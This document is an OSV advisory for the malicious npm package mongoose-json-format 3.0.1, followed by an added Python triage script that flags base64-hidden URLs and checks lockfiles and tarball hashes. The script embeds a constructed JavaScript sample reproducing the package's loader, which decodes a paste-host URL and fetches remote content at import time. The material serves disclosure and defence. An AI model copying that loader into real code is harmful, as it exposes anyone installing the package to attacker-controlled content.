{"id":"MAL-2026-6499","summary":"Malicious code in mongoose-json-format (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5)\nOn require(), helpers.js instantiates a Helper whose constructor invokes createLog(). createLog() base64-decodes the string assigned to HASH_KEY (decoding to https://www.jsonkeeper.com/b/XVHGD, an anonymous mutable JSON paste host), fetches that URL, and passes the response body's `data.data` field as `threadContent` to createLogger() from the `log-format-thread` dependency. The package's advertised purpose is formatting Mongoose JSON output; there is no legitimate reason for it to retrieve content from a paste host at import time. The URL is hidden via base64 and given the misleading name HASH_KEY. Because jsonkeeper.com content is attacker-mutable and the fetched bytes are handed to a dependency for processing, any consumer that require()s this package becomes a vehicle for arbitrary attacker-controlled content delivered at import time.\n","modified":"2026-06-26T03:31:24.734006171Z","published":"2026-06-26T02:18:00Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-26T02:18:00Z","sha256":"2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5","id":"IN-MAL-2026-007580","versions":["3.0.1"],"source":"amazon-inspector","import_time":"2026-06-26T03:14:43.369667512Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/mongoose-json-format/v/3.0.1"}],"affected":[{"package":{"name":"mongoose-json-format","ecosystem":"npm","purl":"pkg:npm/mongoose-json-format"},"versions":["3.0.1"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"8f21df5695fa1442406e75bd4d1fa0013621e96fb3ecce51fe8d0bf19fc1a3016d6b84","sha256":"3d8d12245d3c6c871a78903c83a42578fc7b24c6c9c58c3a5251a537bb5cb881","path":"helpers.js"}],"package_integrity":[{"filename":"mongoose-json-format-3.0.1.tgz","hashes":{"sha512_sri":"sha512-bZealaIA6JsKHbeVaGoKn7umHT4opx7F8dX1e0bSMn7Hv2arWQjkfh2VqAorpyVZ/Hl4bNef0XATr52dBSyF/A==","sha1":"405689d0e26983f1d60b7dbdeef310427a047ed3"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mongoose-json-format/MAL-2026-6499.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}
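The advisory describes the loader pattern (a base64 literal under a misleading name that decodes to a paste-host URL, fetched at require() time) and lists the identifiers of the flagged artifact. Below is an added triage script, not part of the advisory, the OSV record, or the package: it flags quoted string literals in JS source that base64-decode to an http(s) URL, and checks a package-lock.json and a tarball against the version and sha512 SRI given above. The `SAMPLE_JS` and `SAMPLE_LOCK` inputs are constructed for the example (the JS mimics the described behaviour but is not the real helpers.js, and the `createLogger` call shape and the lockfile's other entries are assumptions); the only values taken from the advisory are the package name, version 3.0.1, the jsonkeeper.com URL, and the tarball's `sha512_sri`.

```python
"""Added triage example for MAL-2026-6499 (not the advisory's or the package's code).

  1. find string literals in JS source that base64-decode to an http(s) URL,
     the way HASH_KEY hides https://www.jsonkeeper.com/b/XVHGD;
  2. check a package-lock.json (lockfileVersion 2/3 "packages" map) and a
     tarball against the advisory's version and sha512 SRI.

SAMPLE_JS and SAMPLE_LOCK are constructed inputs, not the real helpers.js
or a real lockfile.
"""
import base64
import binascii
import hashlib
import json
import re
from urllib.parse import urlparse

FLAGGED_NAME = "mongoose-json-format"
FLAGGED_VERSIONS = {"3.0.1"}
# sha512 SRI of mongoose-json-format-3.0.1.tgz, from the advisory's package_integrity
FLAGGED_SRI = ("sha512-bZealaIA6JsKHbeVaGoKn7umHT4opx7F8dX1e0bSMn7Hv2arWQjkfh2VqAorpyVZ"
               "/Hl4bNef0XATr52dBSyF/A==")
# the anonymous, attacker-mutable paste host named in the advisory
PASTE_HOSTS = {"jsonkeeper.com", "www.jsonkeeper.com"}

# quoted literals long enough to be a base64-encoded URL (>= 16 chars, optional padding)
B64_LITERAL = re.compile(r"""["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]""")


def find_hidden_urls(js_source):
    """Return [(literal, url, is_paste_host)] for literals that decode to an http(s) URL."""
    hits = []
    for m in B64_LITERAL.finditer(js_source):
        literal = m.group(1)
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: leave it alone
        parts = urlparse(decoded)
        if parts.scheme in ("http", "https") and parts.netloc:
            hits.append((literal, decoded, parts.hostname in PASTE_HOSTS))
    return hits


def flagged_in_lockfile(lock_text):
    """Return lockfile paths that install the flagged version or the flagged tarball."""
    packages = json.loads(lock_text).get("packages", {})
    suffix = "node_modules/" + FLAGGED_NAME
    return [
        path for path, meta in packages.items()
        if (path == suffix or path.endswith("/" + suffix))
        and (meta.get("version") in FLAGGED_VERSIONS or meta.get("integrity") == FLAGGED_SRI)
    ]


def sri_sha512(data):
    """Subresource-integrity string as npm writes it: 'sha512-' + base64(SHA-512(bytes))."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def is_flagged_tarball(data):
    """True when the tarball bytes match the advisory's sha512 SRI."""
    return sri_sha512(data) == FLAGGED_SRI


# Constructed sample mirroring the described loader; not the real helpers.js.
SAMPLE_JS = r'''
const { createLogger } = require("log-format-thread");
const HASH_KEY = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9YVkhHRA==";
const PAD = "AAAAAAAAAAAAAAAAAAAAAA==";
class Helper {
  constructor() { this.createLog(); }
  async createLog() {
    const url = Buffer.from(HASH_KEY, "base64").toString("utf8");
    const body = await (await fetch(url)).json();
    createLogger({ threadContent: body.data.data });  // assumed call shape
  }
}
module.exports = new Helper();
'''

# Constructed lockfileVersion 3 excerpt; the mongoose entry is filler.
SAMPLE_LOCK = json.dumps({
    "name": "example-app", "lockfileVersion": 3, "requires": True,
    "packages": {
        "": {"name": "example-app", "dependencies": {FLAGGED_NAME: "^3.0.0"}},
        "node_modules/" + FLAGGED_NAME: {
            "version": "3.0.1",
            "resolved": "https://registry.npmjs.org/mongoose-json-format/-/mongoose-json-format-3.0.1.tgz",
            "integrity": FLAGGED_SRI,
        },
        "node_modules/mongoose": {"version": "8.0.0", "integrity": "sha512-AAAA"},
    },
})

if __name__ == "__main__":
    for literal, url, paste in find_hidden_urls(SAMPLE_JS):
        print(f"hidden URL {url!r} (paste host: {paste}) from literal {literal[:12]}...")
    print("flagged lockfile entries:", flagged_in_lockfile(SAMPLE_LOCK))
    print("tarball flagged:", is_flagged_tarball(b"not the flagged tarball"))
```

Run the lockfile check over every package-lock.json in a repository and the tarball check over the npm cache or a vendored .tgz; the integrity comparison catches the flagged artifact even if it was republished under a different version string. The literal scanner is a cheap first pass, not a full deobfuscator: it only sees plain base64 string literals, so split, reversed or hex-encoded URLs need a different rule.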